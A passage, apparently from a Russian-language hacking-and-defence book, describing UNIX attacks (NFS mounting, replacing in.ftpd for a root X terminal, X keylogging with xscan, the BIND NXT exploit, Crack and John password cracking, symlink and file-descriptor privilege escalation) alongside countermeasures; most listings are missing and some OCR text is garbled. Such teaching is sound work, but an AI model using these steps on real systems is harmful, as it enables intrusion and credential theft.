Контрмеры: защита служб RFC Лучшим методом защиты от удаленных атак является отключение всех служб RPC, в использовании которых нет острой необходимости. Если же какая-то служба RPC очень важна для работы сервера, подумайте над установкой какого-либо устройства управления доступом, с помощью которого связь с необходимыми портами RPC можно было бы разрешить только строго определенным узлам. В некоторых случаях эта задача может оказаться весьма непростой. Подумайте также над включением режима, запрещающего выполнение стека, если такой режим поддерживается вашей операционной системой. Наконец. попробуйте использовать Secure RPC, если имеющаяся в вашем распоряжении версия UNIX поддерживает такие средства. Secure RPC обеспечивает дополнительный уровень аутентификации, основанной на шифровании по открытому ключу. Помните, что Secure RPC — это не панацея, поскольку многие разработчики UNIX не поддерживают этого протокола. Другими словами, при использовании протокола Secure RPC повышается безопасность, но под угрозой может оказаться взаимодействие. Наконец, убедитесь в том, что установлены все самые последние модули обновления, разработанные поставщиком используемой вами системы. NFS В документах компании Sun Microsystems можно встретить такое определение: "Сеть — это и есть компьютер". Действительно, возможности компьютера, не подключенного к сети, гораздо уже, чем его собрата, включенного в локальную или глобальную сеть. Возможно, именно из-за этого сетевая файловая система (NFS — Network File System) является одной из самых популярных файловых систем, предназначенных для поддержки сетевой обработки данных. Система NFS обеспечивает пользователям и приложениям прозрачный доступ к файлам и каталогам удаленных систем, как если бы эти файлы и каталоги были локальными. NFS была разработана компанией Sun Microsystems, и за годы, прошедшие после выхода версий 1 и 2, была значительно усовершенствована. В настоящее время система NFS версии 3 используется в большинстве современных клонов UNIX. Именно поэтому администратор любой системы, разрешающей удаленный доступ к экспортируемой файловой системе, должен быть особенно бдительным. Вероятность использования системы NFS для проникновения в сеть очень высока, а нарушения такого рода являются одними из самых распространенных нарушений безопасности UNIX. Это связано, во-первых, с -тем, что в сервере NFS (mountd) уже выявлено очень много потенциальных ошибок, приводящих к переполнению буфера. Кроме того, системой NFS используются службы RPC, что позволяет взломщикам смонтировать удаленную файловую систему. Большинство проблем, связанных с безопасностью NFS, имеет то или иное отношение к объектам, называемым дескрипторами файлов (file handle). Дескрипторы файлов — это уникальные маркеры, предназначенные для идентификации файлов и каталогов удаленного сервера. Если взломщику удастся выведать или подобрать дескриптор удаленного файла, он сможет легко получить к нему доступ. [tsunami]# rpcinfo -p quake Обратившись к службе преобразования портов, на основе полученных результатов можно сделать вывод о том, что на удаленной системе запушены серверы NFS и mountd. Это означает, что данная система может экспортировать как минимум одну файловую систему. [tsunami]# showmount -е quake Из результатов, полученных с помощью команды showmount, видно, что в рассматриваемом примере экспортируемыми является не только файловая система /usr, но и /, что связано с очень большим риском. Все, что нужно сделать взломщику для получения доступа к такой системе, — это воспользоваться командой mount / или mount /usr. После этого он получит доступ к любому файлу файловой системы / или /usr, в соответствии с разрешениями, заданными для файлов и каталогов. Команда mount входит в состав большинства клонов UNIX, хотя она оказывается и не такой гибкой, как некоторые другие средства. Для того чтобы познакомиться с особенностями использования команды mount более подробно, введите команду man mount, так как в некоторых случаях ее синтаксис может отличаться от того, который вы увидите в приведенном ниже примере. [tsunami n£s]# nfs Сначала нужно сообщить утилите nfs, файловую систему какого узла необходимо смонтировать. nfs> host quake Затем посмотрим, какие файловые системы можно экспортировать. nfs> export Теперь, чтобы получить доступ к файловой системе /, необходимо ее смонтировать. nfs> mount / Проверим состояние соединения и определим идентификатор UID, с которым была смонтирована файловая система.
Итак, мы смонтировали файловую систему / с идентификаторами UID и GID, равными -2. Из соображений безопасности, если вы монтируете удаленную систему как суперпользователь root, ваши идентификаторы UID и GID подменяются другими значениями, отличными от 0. Поскольку мы смонтировали всю файловую систему, теперь без труда можно увидеть содержимое файла /etc/passwd. nfs> cd /etc Итак, теперь нам известны имена пользователей и соответствующие им идентификаторы. Однако файл паролей является скрытым (shadowed), поэтому им нельзя воспользоваться для взлома паролей. Поскольку мы не можем взломать ни одного пароля и, соответственно, не можем смонтировать файловую систему в качестве суперпользователя, необходимо определить другие идентификаторы пользователей, которые позволяют получить привилегированный доступ. Таким пользователем может оказаться daemon, но лучше всего остановить выбор на учетной записи bin. или UID 2, так как на многих системах пользователь bin является владельцем исполняемых файлов. Если взломщик сможет получить доступ к исполняемым файлам посредством системы NFS или каким-либо другим способом, то у большинства систем в таком случае не останется ни единого шанса на выживание. Затем нужно смонтировать систему /usr, изменить идентификаторы UID и GID, а затем попытаться получить доступ к исполняемым файлам. nfs> mount /usr Теперь мы обладаем всеми привилегиями, которыми обладает пользователь bin на удаленной системе. В нашем примере файловая система не была экспортирована с какими-то специальными параметрами, которые ограничивали бы возможности пользователя bin по созданию или модификации файлов. Поэтому все, что осталось сделать, — это запустить программу xterm или создать обратный канал к нашей системе, который позволит получить доступ к взламываемой системе. tt!/bin/sh Теперь нужно перейти в каталог /sbin удаленной системы и заменить исходный файл in. ftpd нашей версией. nfs> cd /sbin И наконец, необходимо указать, чтобы удаленный сервер подключился к Х-серверу нашего узла с помощью команды xhost. Для этого нужно ввести следующие команды. [tsunami]# xhost +quake В результате выполнения всех этих действий наша система станет X-терминалом удаленного узла с привилегиями root. Ввиду того что в этой системе файл in. ftpd вызывается из файла inetd с привилегиями суперпользователя, наш сценарий также будет выполнен с этими привилегиями, что означает получение доступа в качестве суперпользователя. # id
Контрмеры: защита системы NFS Если нет острой необходимости в использовании системы NFS, то ее, а также и все связанные с ней службы (например, mountd, statd и lockd) необходимо отключить. Реализуйте механизм управления доступом, который позволил бы получать доступ к нужным файлам только санкционированным пользователям. Обычно экспортом файловых систем и включением соответствующих параметров управления доступом управляют конфигурационные файлы /etc/exports, /etc/dfs/dfstab и т.д. Некоторые параметры управления доступом позволяют задать имена компьютеров или групп, которым разрешен доступ, установить доступ только для чтения или запретить установку флага SUID. В каждой реализации системы NFS имеются небольшие различия, поэтому более подробную информацию об используемой версии поищите в документации или в справочной системе. Кроме того, никогда не включайте локальный IP-адрес сервера (или localhost) в список систем, которым разрешено монтировать файловую систему. Более старые версии службы portmapper позволяют взломщикам подключаться через proxy-серверы, работающие в интересах этих взломщиков. Если системе было разрешено монтировать экспортируемую файловую систему, взломщики могут отправить пакеты NFS службе portmapper взламываемой системы, что, в свою очередь, приведет к пересылке запроса на localhost. Такой запрос будет выглядеть так, словно он поступил с доверенного узла, что позволит ему обойти соответствующие правила управления доступом. Как всегда, в качестве последней по порядку (но не по значимости!) меры, советуем установить все модули обновления, предлагаемые разработчиками программного обеспечения. Проблемы защиты системы X Система X Window предоставляет богатый набор функций, позволяющий многим программам одновременно использовать один и тот же графический дисплей. Но с точки зрения безопасности самой большой проблемой системы X Windows является реализованная в ней модель защиты, которую коротко можно охарактеризовать так: "Все или ничего". После того как клиент получил доступ к Х-серверу, ему выдается полная индульгенция. Клиенты X могут перехватывать нажатия клавиш на пользовательской консоли, закрывать окна, захватывать любые окна сервера и отображать их содержимое где угодно, и даже переключать клавиатуру на свою, независимо от того, какие клавиши нажимает пользователь. Многие проблемы основываются на слабой парадигме управления доступом или полном равнодушии системного администратора. Самой простой и популярной формой управления доступом к X является аутентификация с использованием команды xhost. Данный механизм обеспечивает управление доступом на основе IP-адреса и является при этом наиболее слабой формой аутентификации. Для удобства работы системный администратор может ввести команду xhost +, что позволит получить доступ к Х-серверу без какой-либо аутентификации любому локальному или удаленному пользователю (при использовании параметра + доступ к серверу разрешен для всех узлов). Что еще хуже, многие Х-серверы, работающие на платформе PC, по умолчанию настроены именно на использование команды xhost +, подвергая тем самым огромной опасности ничего не подозревающих пользователей. Как вы понимаете, этим, казалось бы незначительным, недостатком могут воспользоваться злоумышленники. [tsunami]$ xscan quake Теперь все клавиши, нажимаемые на клавиатуре удаленного компьютера, будут регистрироваться в файле KEYLOG.quake. [tsunami]$ tail -f KEYLOG.quake:0.0 Затем достаточно воспользоваться командой tail, чтобы увидеть, что набирает на клавиатуре пользователь в режиме реального времени. В нашем примере пользователь ввел команду su, а затем, в ответ на приглашение, — пароль lamowned! (утилита xscan умеет даже определять нажатие клавиш <Shift>). [tsunami]! xlswins -display quake:0.0 Igrep -i netscape Программа xlswins отображает много информации, поэтому в нашем примере мы используем утилиту grep, чтобы установить, запушен ли броузер Netscape. К счастью, нам повезло — броузер Netscape действительно запущен на удаленном компьютере. Однако ничего не мешает просмотреть все выдаваемые утилитой xlswins результаты и найти интересующие вас окна, не полагаясь на удачу. Теперь, для того чтобы увидеть окно Netscape на своем компьютере, мы воспользуемся программой XWatchWin, как показано на рис. 8.3.
Контрмеры: защита системы X Сделайте все возможное, чтобы избежать использования команды xhost +. He ленитесь, помните о безопасности! Если вы не можете пойти на столь радикальные меры, тогда хотя бы применяйте команду xhost -, которая запрещает новые подключения, однако позволяет функционировать уже имеющимся. Если вы должны разрешить удаленный доступ к вашему Х-серверу, обязательно указывайте IP-адрес каждого сервера, которому разрешен доступ. Никогда не забывайте о том, что любой пользователь такого сервера может скрытно подключиться к вашему Х-серверу. Среди других мер по обеспечению безопасности можно выделить применение более серьезного механизма аутентификации, такого как MIT-MAGIC-COOKIE-1, XDM-AUTHORIZATION-1 и MIT-KERBEROS-5. Эти механизмы обеспечивают довольно высокий уровень защиты при подключении к Х-серверу. Если вы используете программу xterm или аналогичный терминал, включите режим Secure Keyboard. Это позволит запретить любому процессу перехватывать нажатия клавиш. Кроме того, подумайте о том, чтобы блокировать доступ извне к портам 6000-6063 на уровне брандмауэра с целью запретить несанкционированным пользователям подключаться к портам Х-сервера. И наконец, воспользуйтесь защищенной оболочкой ssh и ее возможностями по повышению уровня защиты сеансов X. Убедитесь, что в файле sshd_config или sshd2_config для параметра ForwardXll установлено значение yes. Атаки на систему DNS DNS является одной из наиболее популярных служб, используемых в Internet и большинстве корпоративных интрасетей. Как и следовало ожидать, такое широкое распространение службы DNS оказалось одной из причин многочисленных атак на эту систему. Взломщики постоянно пытаются воспользоваться слабыми местами одной из наиболее стандартной реализации службы DNS системы UNIX— пакета BIND (Berkeley Internet Name Domain). Кроме того, DNS является одной из нескольких служб, которые практически всегда оказываются необходимыми и функционируют по всему периметру корпоративной сети, обеспечивая доступ к Internet. Таким образом, любая ошибка службы DNS практически всегда приводит к возможности удаленного проникновения (зачастую с привилегиями root). В одном из отчетов по вопросам безопасности, который был опубликован в 1999 году и взбудоражил общественное мнение, сообщалось, что более 50% всех соединенных с Internet серверов DNS уязвимы для атак взломщиков. Так что подобная опасность абсолютна реальна. Соблюдайте осторожность! [ tsunami]# dig В приведенном фрагменте для определения используемой версии службы DNS демону named передается соответствующий запрос. Сейчас стоит еще раз подчерктть важность процесса предварительного сбора данных. В рассматриваемом примере на целевом сервере DNS используется программа named версии 8.2.2, которая уязвима для атак NXT. Для этой же атаки оказываются уязвимыми также версии 8.2 и 8.2.1 этой программы. [tsunami]# adm-nxt После проведения предварительного сбора данных с использованием утилиты шпар стало известно, что на удаленном узле используется система Red Hat 6.x. Таким образом, для утилиты adm-nxt необходимо задать режим 1. [quake]# nslookup Как видно из приведенного листинга, взломщик запустил команду nslookup в интерактивном режиме на отдельном компьютере, находящемся в его полном распоряжении. Затем он перешел от использования сервера DNS, заданного по умолчанию, к [tsunami]# t666 I
Контрмеры: защита службы DNS Первое и самое главное — отключите и удалите пакет BIND на всех узлах, которые не используются в качестве сервера DNS. Во многих версиях системы UNIX (особенно Linux) программа named автоматически запускается при начальной загрузке компьютера, несмотря на то, что она никогда не используется. Во-вторых, удостоверьтесь в том, что используется текущая версия пакета BIND, в состав которой входят модули обновления подсистемы защиты (www.bind.org). В-третьих, запускайте программу named с правами непривилегированного пользователя. Другими словами, программа named должна запускаться с привилегиями root только для связывания с портом 53. После этого эти привилегии нужно понизить с использованием параметра -u (named -и dns -g dns). И наконец, программа named должна запускаться с использованием параметра -t из среды chrooted() (named -u dns -g dns -t /home/dns). Это поможет предотвратить попытки взломщика, связанные с обходом файловой системы и в том случае, если им был получен доступ. Даже если все перечисленные меры защиты решат поставленную задачу, не стоит успокаиваться на достигнутом. Безопасности сервера DNS необходимо постоянно уделять самое пристальное внимание. |
Локальный доступ Итак, мы рассмотрели общие принципы получения удаленного доступа. Как уже упоминалось выше, большинство взломщиков, используя изъяны в защите средств удаленного доступа, стремятся получить локальный доступ. Если злоумышленнику удается получить интерактивный доступ к командной оболочке, он рассматривается системой как локальный пользователь. Хотя при удаленном взломе в некоторых случаях злоумышленникам удается сразу же получить доступ к компьютеру в качестве суперпользователя root, в большинстве случаев им приходится начинать с доступа в качестве обычного пользователя. Таким образом, взломщик должен заняться деятельностью, призванной расширить его полномочия от простого пользователя до суперпользователя. Эта деятельность называется расширением полномочий (privilege escalation). Сложность методики расширения полномочий зависит как от типа и версии используемой операционной системы, так и от качества ее настройки на конкретном компьютере. Некоторые операционные системы по умолчанию принимают все меры, препятствующие обычным пользователям расширять полномоия до уровня суперпользователя root, тогда как другие позволяют это делать. Например, пользователю операционной системы OpenBSD, установленной с параметрами настройки, принятыми по умолчанию, значительно сложнее расширить свои полномочия до уровня root, чем, скажем, пользователю операционной системы Irix. Конечно, индивидуальная настройка может значительно повысить уровень общей безопасности системы. В следующем разделе этой главы будут рассматриваться методы, позволяющие обычному пользователю получить доступ к системе на уровне суперпользователя. Необходимо заметить, что, хотя для большинства взломщиков типичным является поведение, заключающееся в попытках получить доступ на уровне root, в некоторых случаях у злоумышленника может не быть такой необходимости. Например, если взломщика интересует получение доступа к базе данных Oracle, то ему, скорее всего, достаточно будет получить доступ к учетной записи, под которой работает Oracle, а не к учетной записи root. Поиск неправильно выбранных паролей Как уже отмечалось выше, после того, как взломщику удалось получить доступ, самую большую угрозу для безопасности представляют собой легко угадываемые пароли. Не имеет значения, идет ли речь об удаленном или локальном доступе — неправильно выбранные пароли представляют собой одно из самых слабых мест системы защиты. Ввиду того что выше мы уже указывали на основные проблемы, связанные с выбором паролей, здесь мы остановимся в основном на изучении методов взлома.
Из всего многообразия программ, предназначенных для взлома паролей, можно выделить Crack 5.0а Алека Маффета (Alec Muffett) и John the Ripper. Программа Crack 5.0л, которую для краткости мы будем называть просто Crack, является, пожалуй, самой популярной программой взлома паролей. К тому же она постоянно совершенствуется, а ее весьма обширный словарь, содержащий очень широкий спектр возможных паролей — от ненормативной лексики до названий из сериала Star Trek, — постоянно пополняется. Crack поддерживает даже возможность распределения вычислений, предназначенных для взлома пароля, на нескольких компьютерах. Программа John the Ripper, или просто John, является более новой, чем Crack 5.0a. Ее отличительная особенность заключается в высокой степени оптимизации для взлома максимально возможного количества паролей за минимальное время. Кроме того, John поддерживает больше алгоритмов хэширования, чем Crack. Обе программы позволяют проверять не только слова, находящиеся в словаре, но и их модификации. По умолчанию в состав каждого из этих двух инструментов входит более 2400 правил, которые можно применить к словарю для подбора паролей, которые, казалось бы, очень трудно взломать. В комплект поставки обеих программ входит обширная документация, с которой мы настоятельно рекомендуем ознакомится. Чтобы не рассматривать все возможные параметры и режимы работы этих программ, мы покажем, как запустить Crack на выполнение и прокомментируем полученные результаты. Для этого вам необходимо знать структуру файла паролей. Если вы недостаточно владеете данным вопросом, обратитесь к хорошей книге по UNIX. Crack 5.0a Для того чтобы запустить программу Crack, достаточно указать, где находится файл паролей, а затем лишь дождаться результата. Crack является самокомпилирующейся программой, поэтому после запуска на самом деле вызывается утилита make, которая собирает воедино все необходимые компоненты. Одной из сильных сторон программы Crack является обширный набор правил создания различных словоформ и модификаций. Кроме того, при каждом запуске эта программа генерирует пользовательский список слов, в который включается такая информация, как имя пользователя, а также сведения, указанные в поле GECOS (комментарии). Именно поэтому не забывайте посмотреть на поле GECOS при взломе паролей! Очень часто в поле GECOS пользователи указывают свое полное имя и при этом выбирают пароль, который представляет собой некоторую комбинацию имени и фамилии или их частей. Программа Crack очень легко справляется с такими несложными паролями. Давайте посмотрим как выглядит типичный файл паролей, а затем попробуем применить к нему программу взлома. root:cwIBREDaWLHmo:0:0:root:/root:/bin/bash Для того чтобы запустить программу Crack для взлома данного файла, необходимо воспользоваться следующей командой. [tsunamitt Crack passwd Начиная с этого момента программа Crack переходит к функционированию в фоновом режиме с сохранением результатов в базе данных. Для того чтобы обратиться к этой базе данных и узнать, какие пароли были взломаны, необходимо запустить утилиту Reporter. [tsunami]# Reporter -quiet Если вы хотите увидеть только пароли, взломанные к текущему моменту, необходимо запустить профамму Reporter с параметром -quiet. При запуске утилиты без параметров на экран выводятся сведения об ошибках, предупреждения, а также сведения о заблокированных паролях. В комплект поставки профаммы Crack входит еще и несколько очень полезных сценариев. Один из них — shadmrg. sv. Он предназначен для объединения файла паролей UNIX со скрытым файлом паролей, что позволяет получить один исходный файл, содержащий всю информацию, необходимую для взлома паролей. Еще одной интересной командой является команда make tidy, с помощью которой можно удалить остаточные учетные пользовательские записи и пароли после выполнения Crack. John the Ripper John the Ripper — одна из лучших утилит взлома паролей, доступных в настоящее время. Ее версии как для UNIX, так и для NT можно найти по адресу http://www.openwall.com/john/. Как уже упоминалось, программа John является одной из лучших и самых быстрых утилит и она очень проста в применении. [shadow]# John passwd На вход утилиты John при запуске подается файл паролей (passwd), и это все, что нужно сделать. Утилита самостоятельно определит применяемый алгоритм шифрования, в данном случае DES, а затем приступит к взлому паролей. Сначала будет использован файл словаря (password. 1st), а затем начнется процесс подбора паролей. Как видно из приведенного листинга, утилитой John был получен пароль пользователя job, тогда как программе Crack удалось подобрать пароль пользователя j f г. Так что с помощью каждой программы были получены различные результаты. В основном это объясняется ограниченным списком слов, содержащимся в файле словаря \тили-ты John, так что мы рекомендуем его расширить. Обширный список слов можно найти ПО адресу http://packetstorm.securify.com/Crackers/wordlists/. Контрмеры: защита от взлома неправильно выбранных паролей Контрмеры, позволяющие защитить систему от попыток взлома неправильно выбранных паролей, приведены в разделе "Защита От Подбора Паролей "В Лоб"" выше в данной главе. Локальное переполнение буфера Взлом путем локального переполнения буфера — один из самых популярных видов атак. Как уже упоминалось выше в этой главе в разделе "Удаленный Доступ", используя переполнение буфера, взломщик может запустить на интересующей его системе произвольный код или команду. В большинстве случаев переполнение буфера применяется для взлома файлов, работающих в контексте SUID суперпользователя, что обеспечивает злоумышленнику возможность запуска команд с привилегиями root. Выше в разделе "Взлом Путем Переполнения Буфера" этой главы мы уже рассматривали, как при возникновении переполнения буфера можно выполнить произвольный код. В этом разделе мы на нескольких примерах рассмотрим, как происходит типичный взлом путем локального переполнения буфера. [quake]$ ./ex_lobc Итак, программа взлома перешла к заданному адресу памяти, в результате чего оболочка /bin/sh запустилась с привилегиями суперпользователя, о чем говорит символ # в строке приглашения. Данный пример очень прост и дает возможность любому почувствовать себя экспертом в вопросах безопасности. На самом деле участники группы Shadow Penguin Security проделали колоссальную работу, чтобы найти данный изъян и написать соответствующую программу. Как легко догадаться, простота получения доступа на уровне суперпользователя — это основная притягательная сила, побуждающая взломщиков использовать программы, приводящие к локальному переполнению буфера. Контрмеры: защита от локального переполнение буфера Лучшим методом зашиты от локального переполнения буфера является учет требований безопасности в процессе программирования, а также включение режима, запрещающего выполнение кода, находящегося в стеке. Достаточно выполнить хотя бы последнее требование, чтобы значительно усложнить работу злоумышленника, который попытается написать программу, использующую только что рассмотренный изъян. Полный перечень контрмер приведен в разделе "Взлом Путем Переполнения Буфера" данной главы. Здесь мы лишь добавим, что очень хорошей практикой является установка бита SUID только для тех программ, которым действительно необходим доступ на уровне суперпользователя. Символьные ссылки Устаревшие, рабочие и временные файлы в той или иной степени "захламляют" большинство систем. К счастью, в UNIX большинство временных файлов создается в одном каталоге /tmp. Однако, хотя, с одной стороны, это и удобно, с другой — несет в себе определенную опасность. Многие программы, работающие в контексте SUID суперпользователя, создают рабочие файлы в каталоге /tmp или других подобных каталогах даже без намека на какую-либо проверку соблюдения правил безопасности. Основная проблема связана с использованием некоторыми программами при доступе к файлам символьных ссылок без проверки того, является ли тот или иной файл ссылкой или же реальным файлом. Символьная ссшка (symbolic link) — это файл специального вида, созданный с помощью команды In. По сути, такой файл представляет собой не что иное, как ссылку на другой файл. Давайте, например, создадим символьную ссылку /tmp/fоо на файл /etc/passwd. [quake]$ 1s -1 /etc/passwd Теперь создадим символьную ссылку /var/dt/appconfig/appmanager/generic-display-0, указывающую на файл /etc/passwd. [quake]$ In -s /etc/passwd /var/dt/appconfig/ Наконец, запустим утилиту dtappgather, а затем проверим права доступа к файлу /etc/passwd. [quake]$ /usr/dt/bin/dtappgather Итак, утилита dtappgather "бездумно" воспользовалась созданной нами символьной ссылкой и изменила владельца и права доступа к файлу /etc/passwd. Теперь то же самое нужно проделать для файла /etc/shadow. После того как изменены владельцы файлов /etc/shadow и /etc/passwd, можно модифицировать эти файлы и добавить в них учетную запись с UID 0 (эквивалент суперпользователя). И на все это уйдет не больше минуты! Контрмеры: защита от взлома с использованием символьных ссылок В данном случае самой лучшей защитой является программирование с учетом требований безопасности. К сожалению, алгоритмы многих программ не предусматривают проведение профилактической проверки уже созданных файлов. Прежде чем создавать файл, программист должен проверить его существование, воспользовавшись флагами O_EXCL | O_CREAT. При создании временных файлов задайте маску с помощью команды umask, а затем воспользуйтесь функциями tmpfileO или mktemp (). Если вам действительно интересно знать, какими программами создаются временные файлы, воспользуйтесь следующей командой в каталоге /bin или /usr/sbin/. Взлом с помощью дескриптора файла Дескрипторы файлов (file descriptor) — это неотрицательные целые числа, которые используются системой для управления файлами. Дескрипторы позволяют облегчить работу операционной системы, устраняя необходимость манипуляции именами файлов. В соответствии с принятыми соглашениями, дескрипторы 0, 1 и 2 определяют стандартный входной поток, стандартный выходной поток и стандартный поток ошибок соответственно. Таким образом, когда функции ядра открывают существующий файл или создают новый, они возвращают определенный дескриптор, который может использоваться программой для выполнения над этим файлом операций чтения/записи. Если дескриптор соответствует файлу, который был открыт для чтения и записи (O_RDWR) привилегированным процессом, то во время модификации этого файла взломщик может получить к нему доступ и произвести в него запись. Таким образом, с помощью этого метода можно модифицировать один из важных системных файлов и получить доступ на уровне суперпользователя. #Chanqing user database information for gk. Теперь на время выйдем из редактора vi в командную оболочку, воспользовавшись для этого командой ! sh. [dinky]$ nohup ./chpass & Как только мы воспользовались командой su и учетной записью owned, мы получили доступ на уровне суперпользователя. Весь описанный процесс можно воплотить всего лишь в нескольких строках кода. int Этот код предоставлен Марком Зелинским (Mark Zielinski). Контрмеры: защита от взлома с помощью дескриптора файла Разработчики программ, предназначенных для работы в контексте SUID, должны следить за корректностью распределения дескрипторов файлов. В частности, при системном вызове execveO необходимо устанавливать флаг close-on-exec. Как уже упоминалось выше, необходимо также сбросить бит SUID у всех программ, для которых его устанавливать необязательно. Гонки на выживание В реальной жизни хищник нападает на жертву, когда она наименее защищена. В ки-берпространстве эта аксиома также имеет место. Компьютерные взломщики, как правило, стремятся воспользоваться недостатками в системе защиты программы или процесса при выполнении ими какой-нибудь привилегированной операции. Обычно при этом время взлома-планируется таким образом, чтобы повредить программу или процесс после того, как они перейдут в привилегированный режим, но до завершения использования привилегированных прав. В большинстве случаев этот временной интервал достаточно ограничен, поэтому взломщикам нужно очень хорошо рассчитать момент нападения, чтобы успеть вовремя скрыться со своей добычей. Недостаток системы защиты, позволяющий злоумышленнику установить факт наличия такого временного интервала, называется состоянием гонки на выживание (race condition). Если взломщику удается вмешаться в нор-мальную работу в то время, когда процесс или программа находится в привилегированном состоянии, то говорят о том, что он "выигрывает гонку" (winning the race). Состояние гонки на выживание может быть различных типов. Мы ограничимся описанием тех из них, которые связаны с обработкой сигналов. Проблемы обработки сигналов В системе UNIX сигналы (signal) обеспечивают механизм, используемый для извещения процесса о том, что возникло какое-то определенное условие. Кроме того, с помощью сигналов обрабатываются асинхронные события. Например, когда пользователь хочет приостановить работу выполняющейся программы, он нажимает комбинацию клавиш <Ctrl-t-Z>. При этом всем активным процессам (foreground) рассылается сигнал SIGTSTP. Таким образом, с помощью сигналов изменяется ход выполнения программы. Как и раньше, выражение "изменяется ход выполнения программы" должно вызвать у вас мгновенную реакцию, так как такие действия обычно таят в себе угрозу для безопасности. Действительно, возможность влиять на ход выполнения работающей программы — одна из самых важных проблем в обеспечении безопасности обработки сигналов. Если бы дело ограничивалось лишь сигналом SIGTSTP, это было бы не столь критично, однако в действительности для подобных целей может использоваться свыше 30 сигналов, что, как вы понимаете, представляет собой сложную проблему. Контрмеры: защита от взлома с помощью сигналов Когда речь идет о файлах SUID, корректная обработка сигналов должна быть обязательным требованием. Если программа перехватывает и обрабатывает сигналы надлежащим образом, конечный пользователь не сможет сделать ничего такого, что нарушило бы безопасность. Конечно, об этом должны позаботится программисты, а администратор прежде всего должен убедиться в том, что бит SUID установлен только для тех файлов, которым это действительно необходимо. Об этом уже неоднократно говорилось. Кроме того, нужно удостовериться в том, что установлены все модули обновления, предоставленные разработчиком операционной системы. Манипуляции с файлами дампов Возможность получения дампа (core file) при выполнении программы может привести гораздо к более серьезным последствиям, чем кажется на первый взгляд. Во время работы системы UNIX в памяти может находиться много важной информации, включая, например, хэш-коды паролей, считанные из скрытого файла паролей. Одним из примеров манипуляций с файлами дампов является изъян, имевший место в старых версиях FTPD. Сервер FTPD позволял взломщикам записать дамп оперативной памяти в общедоступный файл, размещаемый в корневом каталоге. Для этого перед подключением к серверу нужно было лишь передать команду PASV. Помимо прочего в файле дампа содержалась часть скрытого файла паролей и в большинстве случаев хэш-коды пользовательских паролей. Если взломщику удавалось найти эти коды в файле дампа, он получал возможность взломать привилегированную учетную запись и получить доступ к системе на уровне суперпользователя. Контрмеры: защита от взлома с помощью файлов дампов Файлы дампов — это неизбежное зло. Несмотря на то что они могут предоставить взломщику конфиденциальную информацию, они также обеспечивают получение не менее важной информации и системному администратору в тех случаях, когда выполнение программы завершается аварийно. Если того требуют ваши правила обеспечения безопасности, можно ограничить генерацию файлов дампов с помощью команды ulimit и даже полностью отключить ее, установив ulimit равным 0 в системном профиле. Более подробную информацию по команде ulimit вы найдете в интерактивной справочной системе. [tsunami]$ ulimit -a
Совместно используемые библиотеки Совместно используемые библиотеки (shared library) позволяют исполняемым файлам обращаться к функциям общего назначения во время выполнения. Соответствующий программный код заранее компилируется, а затем помещается в ту или иную совместно используемую библиотеку. При запуске программы, которой нужна какая-то функция, находящаяся в такой библиотеке, программа обращается к этой библиотеке, загружает в память нужный код и выполняет его. Главным преимуществом таких библиотек является экономия дискового пространства и оперативной памяти, а также упрощение сопровождения программ, так как обновление библиотеки автоматически влечет за собой обновление функциональности всех работающих с ней программ. Конечно, за повышенное удобство приходится расплачиваться ослаблением безопасности. Если взломщику удастся модифицировать совместно используемую библиотеку или с помощью переменных окружения ему удастся переключить программы на применение своей собственной библиотеки, это может привести к получению им доступа на уровне суперпользователя. Контрмеры: защита совместно используемых библиотек При зафузке модулей с установленным флагом SU1D суперпользователя динамические компоновщики должны игнорировать значения переменной окружения LD_PRELOAD. Пуристы могут возразить, что совместно используемые библиотеки должны быть хорошо написаны и нет никакой опасности в том, что они указаны в переменной LD_PRELOAD. В действительности же в этих библиотеках могут оказаться ошибки, снижающие безопасность системы при выполнении кода, хранящегося в библиотеке, в контексте SUID. Более того, защищать совместно используемые библиотеки (например, /usr/lib или lie) нужно также тщательно, как и самые важные файлы. Если взломщик сможет получить доступ к /usr/lib или /lib, система станет абсолютно беззащитной. Изъяны ядра Не секрет, что UNIX является очень сложной и надежной операционной системой. Из-за сложности в UNIX и других мощных операционных системах неизбежно имеются определенные программные ошибки. В UNIX наиболее опасный недостаток связан с самим ядром. Ядро представляет собой внутренний компонент операционной системы, в котором реализована общая модель ее подсистемы защиты. Эта модель обеспечивает обработку разрешений на использование файлов и каталогов, расширение и отключение привилегий файлов SUID, обработку сигналов и т.д. Если слабое место появляется в самом ядре, то под угрозой оказывается безопасность всей операционной системы в целом. Контрмеры: защита ядра Описанный изъян имеет место во многих системах Linux. Поэтому соответствующий модуль обновления системному администратору нужно установить в первую очередь. К счастью, это очень просто осуществить. Для тех, кто использует ядро версии 2.2.x, достаточно просто обновить его до версии 2.2.16 или более высокой. Неправильная настройка системы В предыдущих разделах мы описали часто встречаемые изъяны, а также методы, с помощью которых злоумышленники могут воспользоваться этими недоработками и получить привилегированный доступ. Перечень таких изъянов и соответствующих методов достаточно велик, однако в распоряжении взломщиков имеется гораздо больше методов взлома, чем можно было бы предположить исходя из такого перечня. Это объясняется тем, что зачастую нарушение безопасности происходит не только и не столько из-за наличия технических дефектов в системе защиты, сколько из-за недостаточно тщательной настройки и неэффективных методов администрирования. Операционная система может быть сама по себе очень безопасной и надежной, но если системный администратор изменит права доступа к файлу /etc/passwd, открыв его для всеобщего доступа, все остальные меры по защите данных могут оказаться бесполезными. Именно этот человеческий фактор и недооценивается в большинстве случаев. Права доступа к файлам и каталогам Простота и мощь системы UNIX основывается на реализованном в ней механизме использования файлов. Независимо от того, являются ли они двоичными исполняемыми программами, текстовыми конфигурационными файлами или устройствами, все эти объекты представляют собой файлы с соответствующими правами доступа. Если система разрешений недостаточно хорошо реализована или намеренно изменена администратором, безопасность системы может быть значительно снижена. Ниже описаны два самых распространенных недостатка в процедурах администрирования, которые заключаются в установке для файлов флага SUID, а также в создании файлов, общедоступных для записи. Из-за ограничений на объем книги проблемы обеспечения безопасности устройств (/dev) подробно не рассматриваются, однако это вовсе не означает, что к ним можно применять менее строгие защитные меры. Злоумышленник, который может создавать устройства или получать права чтения/записи важнейших системных ресурсов, таких как /dev/kmem, практически гарантированно сможет получить доступ на уровне суперпользователя. Файлы SUID Установка для файлов бита SUID или SGID — смертельно опасна. Этим все сказано! Ни один другой файл системы UNIX не подвержен столь частым попыткам злоумышленников всех мастей получить несанкционированный доступ, как файл с SUID суперпользователя. Практически во всех описанных выше случаях взлома были задействованы те или иные процессы, выполняющиеся на уровне привилегий суперпользователя, — большинство из них уже имели установленный бит SUID. Переполнение буфера, гонки на выживание и взлом с использованием символьных ссылок никогда не принесут ожидаемого эффекта, если для программы не установлен флаг SUID. К сожалению, большинство разработчиков относятся к биту SUID так, как будто это вышедшая из моды вещь. Пользователи, не 